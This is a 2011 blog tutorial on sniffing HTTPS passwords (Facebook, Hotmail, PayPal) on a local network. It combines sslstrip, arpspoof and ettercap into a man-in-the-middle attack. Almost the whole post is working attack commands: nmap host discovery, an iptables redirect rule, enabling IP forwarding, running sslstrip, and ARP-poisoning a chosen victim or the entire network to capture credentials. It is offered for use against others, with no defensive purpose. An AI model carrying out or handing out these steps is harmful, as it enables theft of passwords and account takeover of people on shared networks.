Tuesday, 15 November 2011

Sniff SSL | https password sniffing 

Tool requirement:
sslstrip, ettercap, arpspoof already in backtrack .

Ok well I'v seen a couple people complaining about not being able to sniff facebook, hotmail and paypal passwords. This is because these sites use an https connection. So before you can sniff these passwords in a mitm attack you need to strip the ssl. Ettercap does have an ssl stripping ability but we're going to use sslstrip because it's better.

First thing you need to get it backtrack 4 pre-final. Or you can use another linux distro, and add the tools yourself.
1. First we need to find out what your subnet and default gateway is. Open up a shell.

you will get something like this
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface * U 0 0 0 wlan0
default UG 0 0 0 wlan0

in my case is the gateway. Therefore is the subnet and we use that with nmap.

2. So now we use nmap to find other machines on the network.
nmap -sP |grep "Host"

3. Now we need to enable ip tables in ettercap.
nano /etc/etter.conf

scroll down untill you find these lines in the file


# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Change them to this
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Hit Ctrl-X then y then enter

4. Now we create our iptables rule
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Now we need to enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

6. Now we need to find the interface your using.

find the interface with your ip address listed underneath it. In my case it's wlan0.

7. Now start sslstrip
sslstrip -a -k -f

OPTION A: (better)
1. Open a new shell and start arpspoof
arpspoof -i wlan0 -t

wlan0 is my interface is my target ip is my gateway

2. Finally, open up another shell and start ettercap in sniffer mode.

ettercap -T -q -i wlan0
wlan0 being your interface
The sniffed passwords will come up in the ettercap window.
Last thing. Arpspoof will not re-arp the victims for you. So just start arp-spoofing with ettercap and shut it down right away.

ettercap -T -M arp:remote -i wlan0 / /

interface: wlan0

then just hit "q" and ettercap will re-arp your victim. I usually already have this command typed and ready to go in a new shell so I can quickly fix the arp cache when I'm done.

OPTION B: (easier)
open up a new shell and start ettercap
ettercap -T -i wlan0 -q -M arp:remote / /

interface: wlan0
target: (leave target blank "//" to poison entire network)

No comments:

Post a Comment